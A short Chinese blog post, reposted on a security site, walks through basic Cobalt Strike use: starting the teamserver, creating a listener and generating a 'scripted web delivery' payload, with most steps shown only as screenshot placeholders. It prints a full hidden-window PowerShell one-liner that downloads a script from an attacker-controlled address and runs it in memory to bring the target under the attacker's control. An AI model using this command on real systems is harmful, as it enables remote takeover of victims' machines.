【知识积累】Cobalt Strike基本操作

admin 2022年1月10日03:32:54安全工具评论21 views403字阅读1分20秒阅读模式

前言

一、基础了解CS

启动CS

基本架构是C/S,所以得先启动服务器

image-20210829113459470

然后连接上去

image-20210829113533498

这是界面

image-20210829113607062

kali里面也可以使用命令启动

image-20210829114227211

让目标连接上teamserver

1、设置监听器

image-20210829115024046

image-20210829115228611

2、生成攻击载荷,在钓鱼攻击里面的脚本web传递

image-20210829115102770

①url 它是个文件路径

②就是让目标通过这个地址和端口下载恶意脚本

③目标机子运行

image-20210829115854163

得到payload

1
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.0.101:26240/a'))"

访问:26240/a路径的ip会发现有恶意代码

image-20210829120336420

这份代码就是 powershell运行 加载到内存执行

3、目标机执行payload

image-20210829120754957

接着就上线cs了

image-20210829120818237

image-20210829121110889

二、个人博客

孤桜懶契:http://gylq.gitee.io

FROM:gylq.gitee Author:孤桜懶契

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年1月10日03:32:54
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  【知识积累】Cobalt Strike基本操作 http://cn-sec.com/archives/730002.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: